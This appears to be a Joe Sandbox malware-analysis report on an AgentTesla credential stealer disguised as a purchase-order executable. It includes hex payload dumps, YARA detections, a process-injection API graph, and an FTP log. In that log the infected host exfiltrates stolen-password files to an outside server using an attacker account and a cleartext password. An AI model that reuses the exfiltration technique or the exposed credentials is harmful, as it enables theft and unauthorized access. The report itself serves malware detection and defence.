                                                            2024-09-27 14:01:27 UTC8000INData Raw: 33 30 30 30 36 33 39 46 34 45 37 46 46 46 46 32 36 32 30 31 35 30 30 30 30 30 30 33 38 45 39 45 37 46 46 46 46 31 31 32 36 33 39 38 31 45 38 46 46 46 46 32 30 30 32 30 30 30 30 30 30 32 38 44 42 30 33 30 30 30 36 33 39 44 33 45 37 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 43 38 45 37 46 46 46 46 30 30 31 31 30 43 31 39 31 37 31 37 37 33 33 33 30 30 30 30 30 41 31 33 32 33 32 30 31 37 30 30 30 30 30 30 33 38 30 34 30 30 30 30 30 30 46 45 30 43 30 33 30 30 34 35 32 44 30 30 30 30 30 30 35 30 30 30 30 30 30 30 44 31 30 32 30 30 30 30 41 39 30 33 30 30 30 30 32 32 30 30 30 30 30 30 33 43 30 33 30 30 30 30 31 34 30 33 30 30 30 30 38 37 30 34 30 30 30 30 42 43 30 33 30 30 30 30 45 45 30 33 30 30 30 30 46 41 30 30 30 30 30 30 46 46 30 32 30 30 30 30
                                                            Data Ascii: 3000639F4E7FFFF26201500000038E9E7FFFF11263981E8FFFF200200000028DB03000639D3E7FFFF26200100000038C8E7FFFF00110C191717733300000A132320170000003804000000FE0C0300452D00000050000000D1020000A9030000220000003C0300001403000087040000BC030000EE030000FA000000FF020000
                                                            2024-09-27 14:01:27 UTC8000INData Raw: 34 30 30 33 34 30 30 30 30 30 30 34 45 30 30 30 30 31 31 32 30 30 32 30 30 30 30 30 30 38 44 31 37 30 30 30 30 30 31 30 41 30 36 32 30 30 30 30 30 30 30 30 30 46 45 30 39 30 30 30 30 41 32 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 39 30 31 30 30 38 43 30 34 30 30 30 30 30 31 41 32 32 30 30 30 30 30 30 30 30 30 30 36 31 34 32 38 42 37 30 34 30 30 30 36 32 36 32 41 31 42 33 30 30 36 30 30 42 45 30 31 30 30 30 30 34 46 30 30 30 30 31 31 37 45 35 39 30 31 30 30 30 34 38 45 33 41 32 39 30 30 30 30 30 30 37 33 34 38 30 31 30 30 30 41 38 30 37 42 30 31 30 30 30 34 37 33 34 39 30 31 30 30 30 41 38 30 36 46 30 31 30 30 30 34 37 45 36 37 30 31 30 30 30 34 37 32 41 39 30 32 30 30 37 30 36 46 46 38 30 30 30 30 30 41 30 32 32 38 37 43 30 33 30 30 30 36 37 45 36 42
                                                            Data Ascii: 400340000004E00001120020000008D170000010A062000000000FE090000A2062001000000FE0901008C04000001A22000000000061428B7040006262A1B300600BE0100004F0000117E590100048E3A29000000734801000A807B010004734901000A806F0100047E6701000472A90200706FF800000A02287C0300067E6B


                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                            Sep 27, 2024 16:01:08.597620010 CEST21497125.2.84.236192.168.2.6220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.220-This is a private system - No anonymous login
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                            Sep 27, 2024 16:01:08.597840071 CEST4971221192.168.2.65.2.84.236USER fgghv@alternatifplastik.com
                                                            Sep 27, 2024 16:01:08.821420908 CEST21497125.2.84.236192.168.2.6331 User fgghv@alternatifplastik.com OK. Password required
                                                            Sep 27, 2024 16:01:08.822221041 CEST4971221192.168.2.65.2.84.236PASS Fineboy777@
                                                            Sep 27, 2024 16:01:09.199562073 CEST21497125.2.84.236192.168.2.6230 OK. Current restricted directory is /
                                                            Sep 27, 2024 16:01:09.422955990 CEST21497125.2.84.236192.168.2.6504 Unknown command
                                                            Sep 27, 2024 16:01:09.423105001 CEST4971221192.168.2.65.2.84.236PWD
                                                            Sep 27, 2024 16:01:09.646322966 CEST21497125.2.84.236192.168.2.6257 "/" is your current location
                                                            Sep 27, 2024 16:01:09.646524906 CEST4971221192.168.2.65.2.84.236TYPE I
                                                            Sep 27, 2024 16:01:09.869910955 CEST21497125.2.84.236192.168.2.6200 TYPE is now 8-bit binary
                                                            Sep 27, 2024 16:01:09.870074987 CEST4971221192.168.2.65.2.84.236PASV
                                                            Sep 27, 2024 16:01:10.106812000 CEST21497125.2.84.236192.168.2.6227 Entering Passive Mode (5,2,84,236,235,146)
                                                            Sep 27, 2024 16:01:10.113187075 CEST4971221192.168.2.65.2.84.236STOR PW_user-849224_2024_09_27_10_01_07.html
                                                            Sep 27, 2024 16:01:10.732423067 CEST21497125.2.84.236192.168.2.6150 Accepted data connection
                                                            Sep 27, 2024 16:01:10.975862026 CEST21497125.2.84.236192.168.2.6226-File successfully transferred
                                                            226-File successfully transferred226 0.243 seconds (measured here), 1.30 Kbytes per second
                                                            Sep 27, 2024 16:01:23.218354940 CEST21497195.2.84.236192.168.2.6220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.220-This is a private system - No anonymous login
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                            Sep 27, 2024 16:01:23.231194019 CEST4971921192.168.2.65.2.84.236USER fgghv@alternatifplastik.com
                                                            Sep 27, 2024 16:01:23.466296911 CEST21497195.2.84.236192.168.2.6331 User fgghv@alternatifplastik.com OK. Password required
                                                            Sep 27, 2024 16:01:23.466491938 CEST4971921192.168.2.65.2.84.236PASS Fineboy777@
                                                            Sep 27, 2024 16:01:23.715820074 CEST21497195.2.84.236192.168.2.6230 OK. Current restricted directory is /
                                                            Sep 27, 2024 16:01:23.958405972 CEST21497195.2.84.236192.168.2.6504 Unknown command
                                                            Sep 27, 2024 16:01:23.958600044 CEST4971921192.168.2.65.2.84.236PWD
                                                            Sep 27, 2024 16:01:24.186109066 CEST21497195.2.84.236192.168.2.6257 "/" is your current location
                                                            Sep 27, 2024 16:01:24.186362982 CEST4971921192.168.2.65.2.84.236TYPE I
                                                            Sep 27, 2024 16:01:24.425266981 CEST21497195.2.84.236192.168.2.6200 TYPE is now 8-bit binary
                                                            Sep 27, 2024 16:01:24.425410032 CEST4971921192.168.2.65.2.84.236PASV
                                                            Sep 27, 2024 16:01:24.654299974 CEST21497195.2.84.236192.168.2.6227 Entering Passive Mode (5,2,84,236,238,41)
                                                            Sep 27, 2024 16:01:24.660563946 CEST4971921192.168.2.65.2.84.236STOR PW_user-849224_2024_09_27_10_01_21.html
                                                            Sep 27, 2024 16:01:25.282978058 CEST21497195.2.84.236192.168.2.6150 Accepted data connection
                                                            Sep 27, 2024 16:01:25.518043995 CEST21497195.2.84.236192.168.2.6226-File successfully transferred
                                                            226-File successfully transferred226 0.222 seconds (measured here), 1.42 Kbytes per second
                                                            Sep 27, 2024 16:01:31.971101999 CEST21497255.2.84.236192.168.2.6220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.220-This is a private system - No anonymous login
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 5 of 100 allowed.220-Local time is now 17:01. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                                                            Sep 27, 2024 16:01:31.972700119 CEST4972521192.168.2.65.2.84.236USER fgghv@alternatifplastik.com
                                                            Sep 27, 2024 16:01:32.200687885 CEST21497255.2.84.236192.168.2.6331 User fgghv@alternatifplastik.com OK. Password required
                                                            Sep 27, 2024 16:01:32.200988054 CEST4972521192.168.2.65.2.84.236PASS Fineboy777@
                                                            Sep 27, 2024 16:01:32.451427937 CEST21497255.2.84.236192.168.2.6230 OK. Current restricted directory is /
                                                            Sep 27, 2024 16:01:32.775887966 CEST21497255.2.84.236192.168.2.6504 Unknown command
                                                            Sep 27, 2024 16:01:32.776045084 CEST4972521192.168.2.65.2.84.236PWD
                                                            Sep 27, 2024 16:01:32.996535063 CEST21497255.2.84.236192.168.2.6257 "/" is your current location
                                                            Sep 27, 2024 16:01:32.996685028 CEST4972521192.168.2.65.2.84.236TYPE I
                                                            Sep 27, 2024 16:01:33.217451096 CEST21497255.2.84.236192.168.2.6200 TYPE is now 8-bit binary
                                                            Sep 27, 2024 16:01:33.217598915 CEST4972521192.168.2.65.2.84.236PASV
                                                            Sep 27, 2024 16:01:33.439220905 CEST21497255.2.84.236192.168.2.6227 Entering Passive Mode (5,2,84,236,194,127)
                                                            Sep 27, 2024 16:01:33.445293903 CEST4972521192.168.2.65.2.84.236STOR PW_user-849224_2024_09_27_10_01_30.html
                                                            Sep 27, 2024 16:01:34.057406902 CEST21497255.2.84.236192.168.2.6150 Accepted data connection
                                                            Sep 27, 2024 16:01:34.279230118 CEST21497255.2.84.236192.168.2.6226-File successfully transferred
                                                            226-File successfully transferred226 0.222 seconds (measured here), 1.41 Kbytes per second

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:10:01:02
                                                            Start date:27/09/2024
                                                            Path:C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exe"
                                                            Imagebase:0x990000
                                                            File size:6'656 bytes
                                                            MD5 hash:A93062EA78A516E011DFD18D4C462C87
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2195447093.0000000003E0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2195447093.0000000003E0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2177833444.0000000002D88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2195447093.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2195447093.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2202112593.0000000006170000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2177833444.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2177833444.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:10:01:06
                                                            Start date:27/09/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                            Imagebase:0x800000
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2330100397.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2322422336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2322422336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2330100397.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2330100397.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:10:01:16
                                                            Start date:27/09/2024
                                                            Path:C:\Users\user\AppData\Roaming\Eggdjjrhey.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\Eggdjjrhey.exe"
                                                            Imagebase:0x2f0000
                                                            File size:6'656 bytes
                                                            MD5 hash:A93062EA78A516E011DFD18D4C462C87
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2362069803.000000000361D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2362069803.000000000361D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2327778523.00000000027F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2327778523.00000000027F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2362069803.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2327778523.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 29%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:10:01:20
                                                            Start date:27/09/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                            Imagebase:0x380000
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2418121035.000000000289E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2418121035.000000000285C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2418121035.000000000285C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:10:01:25
                                                            Start date:27/09/2024
                                                            Path:C:\Users\user\AppData\Roaming\Eggdjjrhey.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Roaming\Eggdjjrhey.exe"
                                                            Imagebase:0x3e0000
                                                            File size:6'656 bytes
                                                            MD5 hash:A93062EA78A516E011DFD18D4C462C87
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.2416647323.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2416647323.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2416647323.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.2449682974.00000000040D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2449682974.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2449682974.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:10:01:29
                                                            Start date:27/09/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                            Imagebase:0xba0000
                                                            File size:42'064 bytes
                                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3390128191.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.3390128191.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:11.8%
                                                              Dynamic/Decrypted Code Coverage:99.1%
                                                              Signature Coverage:5.4%
                                                              Total number of Nodes:317
                                                              Total number of Limit Nodes:13
                                                              execution_graph 49416 60b61e8 49417 60b61fd 49416->49417 49420 60b62c6 49417->49420 49421 60b62e8 49420->49421 49422 60b63ca 49421->49422 49426 60bf2d8 49421->49426 49430 60bf28a 49421->49430 49435 60bf2d2 49421->49435 49427 60bf321 VirtualProtect 49426->49427 49429 60bf38e 49427->49429 49429->49421 49431 60bf303 VirtualProtect 49430->49431 49432 60bf292 49430->49432 49434 60bf38e 49431->49434 49432->49421 49434->49421 49436 60bf2d8 VirtualProtect 49435->49436 49438 60bf38e 49436->49438 49438->49421 49023 127d030 49024 127d048 49023->49024 49025 127d0a3 49024->49025 49027 62adfb0 49024->49027 49028 62ae009 49027->49028 49031 62ae540 49028->49031 49029 62ae03e 49032 62ae56d 49031->49032 49035 62ae703 49032->49035 49036 62ad3e8 49032->49036 49035->49029 49038 62ad40f 49036->49038 49040 62ad8c8 49038->49040 49041 62ad911 VirtualProtect 49040->49041 49043 62ad4cc 49041->49043 49043->49029 49054 62aea90 49055 62aead4 VirtualAlloc 49054->49055 49057 62aeb41 49055->49057 49070 60bdad0 49071 60bdb1f NtProtectVirtualMemory 49070->49071 49073 60bdb97 49071->49073 49058 12c6690 49059 12c66ad 49058->49059 49060 12c66bd 49059->49060 49063 62a8bbf 49059->49063 49067 62a5b91 49059->49067 49064 62a8bde 49063->49064 49066 62ad3e8 VirtualProtect 49064->49066 49065 62a8c05 49066->49065 49069 62ad3e8 VirtualProtect 49067->49069 49068 62a5bac 49069->49068 49044 60d0ea0 49045 60d0ea5 49044->49045 49048 60d10dc 49045->49048 49050 60d10e2 49048->49050 49049 60d0ecb 49050->49048 49050->49049 49051 60bf28a VirtualProtect 49050->49051 49052 60bf2d8 VirtualProtect 49050->49052 49053 60bf2d2 VirtualProtect 49050->49053 49051->49050 49052->49050 49053->49050 49074 60d8fd0 49075 60d8fd5 49074->49075 49083 60d919a 49075->49083 49087 60d9082 49075->49087 49091 60d9003 49075->49091 49095 60d9010 49075->49095 49099 60d92a7 49075->49099 49103 60d9297 49075->49103 49076 60d8ffb 49085 60d9067 49083->49085 49084 60d90fd 49084->49076 49085->49084 49107 60da3d9 49085->49107 49089 60d9067 49087->49089 49088 60d90fd 49088->49076 49089->49088 49090 60da3d9 16 API calls 49089->49090 49090->49089 49093 60d903a 49091->49093 49092 60d90fd 49092->49076 49093->49092 49094 60da3d9 16 API calls 49093->49094 49094->49093 49097 60d903a 49095->49097 49096 60d90fd 49096->49076 49097->49096 49098 60da3d9 16 API calls 49097->49098 49098->49097 49101 60d9067 49099->49101 49100 60d90fd 49100->49076 49101->49100 49102 60da3d9 16 API calls 49101->49102 49102->49101 49105 60d9067 49103->49105 49104 60d90fd 49104->49076 49105->49104 49106 60da3d9 16 API calls 49105->49106 49106->49105 49108 60da3ed 49107->49108 49112 60da6ee 49108->49112 49116 60da4f6 49108->49116 49113 60da4f5 49112->49113 49114 60da493 49112->49114 49120 60dabe0 49113->49120 49117 60da50e 49116->49117 49119 60dabe0 16 API calls 49117->49119 49118 60da493 49119->49118 49121 60dabf5 49120->49121 49157 60db523 49121->49157 49161 60dbaa0 49121->49161 49165 60dad60 49121->49165 49169 60db1a5 49121->49169 49173 60db2a5 49121->49173 49177 60db1ea 49121->49177 49181 60db3aa 49121->49181 49186 60db529 49121->49186 49197 60db412 49121->49197 49201 60db351 49121->49201 49205 60db896 49121->49205 49209 60db997 49121->49209 49213 60db29a 49121->49213 49217 60db09b 49121->49217 49221 60db45e 49121->49221 49225 60db9dc 49121->49225 49229 60dbbc2 49121->49229 49233 60dbc02 49121->49233 49237 60db682 49121->49237 49244 60db8c0 49121->49244 49248 60db101 49121->49248 49252 60dad81 49121->49252 49259 60dbc87 49121->49259 49263 60db247 49121->49263 49267 60db687 49121->49267 49271 60db607 49121->49271 49280 60dbb04 49121->49280 49284 60dae04 49121->49284 49288 60daf89 49121->49288 49292 60db7cc 49121->49292 49296 60db872 49121->49296 49300 60dad33 49121->49300 49304 60daffb 49121->49304 49315 60db478 49121->49315 49122 60dac17 49122->49114 49158 60dad69 49157->49158 49325 60bec88 49158->49325 49329 60bec80 49158->49329 49162 60dad69 49161->49162 49163 60bec88 VirtualAllocEx 49162->49163 49164 60bec80 VirtualAllocEx 49162->49164 49163->49162 49164->49162 49166 60dad69 49165->49166 49167 60bec88 VirtualAllocEx 49166->49167 49168 60bec80 VirtualAllocEx 49166->49168 49167->49166 49168->49166 49170 60dad69 49169->49170 49171 60bec88 VirtualAllocEx 49170->49171 49172 60bec80 VirtualAllocEx 49170->49172 49171->49170 49172->49170 49174 60dad69 49173->49174 49175 60bec88 VirtualAllocEx 49174->49175 49176 60bec80 VirtualAllocEx 49174->49176 49175->49174 49176->49174 49333 60ddb50 49177->49333 49338 60ddb60 49177->49338 49178 60db202 49182 60db3b4 49181->49182 49184 60be728 Wow64SetThreadContext 49182->49184 49185 60be720 Wow64SetThreadContext 49182->49185 49183 60db954 49184->49183 49185->49183 49187 60db546 49186->49187 49351 60bee54 49187->49351 49355 60bedf4 49187->49355 49359 60beeb4 WriteProcessMemory 49187->49359 49361 60bee34 49187->49361 49365 60bee04 49187->49365 49369 60bee94 49187->49369 49188 60dad69 49195 60bec88 VirtualAllocEx 49188->49195 49196 60bec80 VirtualAllocEx 49188->49196 49195->49188 49196->49188 49198 60dad69 49197->49198 49199 60bec88 VirtualAllocEx 49198->49199 49200 60bec80 VirtualAllocEx 49198->49200 49199->49198 49200->49198 49202 60dad69 49201->49202 49203 60bec88 VirtualAllocEx 49202->49203 49204 60bec80 VirtualAllocEx 49202->49204 49203->49202 49204->49202 49206 60dad69 49205->49206 49207 60bec88 VirtualAllocEx 49206->49207 49208 60bec80 VirtualAllocEx 49206->49208 49207->49206 49208->49206 49210 60dad69 49209->49210 49211 60bec88 VirtualAllocEx 49210->49211 49212 60bec80 VirtualAllocEx 49210->49212 49211->49210 49212->49210 49214 60dad69 49213->49214 49215 60bec88 VirtualAllocEx 49214->49215 49216 60bec80 VirtualAllocEx 49214->49216 49215->49214 49216->49214 49218 60dad69 49217->49218 49219 60bec88 VirtualAllocEx 49218->49219 49220 60bec80 VirtualAllocEx 49218->49220 49219->49218 49220->49218 49222 60dad69 49221->49222 49223 60bec88 VirtualAllocEx 49222->49223 49224 60bec80 VirtualAllocEx 49222->49224 49223->49222 49224->49222 49226 60dad69 49225->49226 49227 60bec88 VirtualAllocEx 49226->49227 49228 60bec80 VirtualAllocEx 49226->49228 49227->49226 49228->49226 49230 60dad69 49229->49230 49231 60bec88 VirtualAllocEx 49230->49231 49232 60bec80 VirtualAllocEx 49230->49232 49231->49230 49232->49230 49234 60dad69 49233->49234 49235 60bec88 VirtualAllocEx 49234->49235 49236 60bec80 VirtualAllocEx 49234->49236 49235->49234 49236->49234 49238 60db792 49237->49238 49372 60beff8 49238->49372 49376 60bf014 49238->49376 49381 60bf004 49238->49381 49385 60bf000 49238->49385 49239 60db7ad 49239->49122 49245 60dad69 49244->49245 49246 60bec88 VirtualAllocEx 49245->49246 49247 60bec80 VirtualAllocEx 49245->49247 49246->49245 49247->49245 49249 60dad69 49248->49249 49250 60bec88 VirtualAllocEx 49249->49250 49251 60bec80 VirtualAllocEx 49249->49251 49250->49249 49251->49249 49253 60dad99 49252->49253 49389 60dc2b9 49253->49389 49394 60dc2c8 49253->49394 49254 60dad69 49257 60bec88 VirtualAllocEx 49254->49257 49258 60bec80 VirtualAllocEx 49254->49258 49257->49254 49258->49254 49260 60dad69 49259->49260 49261 60bec88 VirtualAllocEx 49260->49261 49262 60bec80 VirtualAllocEx 49260->49262 49261->49260 49262->49260 49264 60dad69 49263->49264 49265 60bec88 VirtualAllocEx 49264->49265 49266 60bec80 VirtualAllocEx 49264->49266 49265->49264 49266->49264 49268 60dad69 49267->49268 49269 60bec88 VirtualAllocEx 49268->49269 49270 60bec80 VirtualAllocEx 49268->49270 49269->49268 49270->49268 49272 60db61e 49271->49272 49274 60bee04 WriteProcessMemory 49272->49274 49275 60bee34 WriteProcessMemory 49272->49275 49276 60bee54 WriteProcessMemory 49272->49276 49277 60bee94 WriteProcessMemory 49272->49277 49278 60beeb4 WriteProcessMemory 49272->49278 49279 60bedf4 WriteProcessMemory 49272->49279 49273 60db4d2 49273->49122 49274->49273 49275->49273 49276->49273 49277->49273 49278->49273 49279->49273 49281 60dad69 49280->49281 49282 60bec88 VirtualAllocEx 49281->49282 49283 60bec80 VirtualAllocEx 49281->49283 49282->49281 49283->49281 49285 60dad69 49284->49285 49285->49284 49286 60bec88 VirtualAllocEx 49285->49286 49287 60bec80 VirtualAllocEx 49285->49287 49286->49285 49287->49285 49289 60dad69 49288->49289 49290 60bec88 VirtualAllocEx 49289->49290 49291 60bec80 VirtualAllocEx 49289->49291 49290->49289 49291->49289 49293 60dad69 49292->49293 49294 60bec88 VirtualAllocEx 49293->49294 49295 60bec80 VirtualAllocEx 49293->49295 49294->49293 49295->49293 49297 60dad69 49296->49297 49298 60bec88 VirtualAllocEx 49297->49298 49299 60bec80 VirtualAllocEx 49297->49299 49298->49297 49299->49297 49301 60dad44 49300->49301 49302 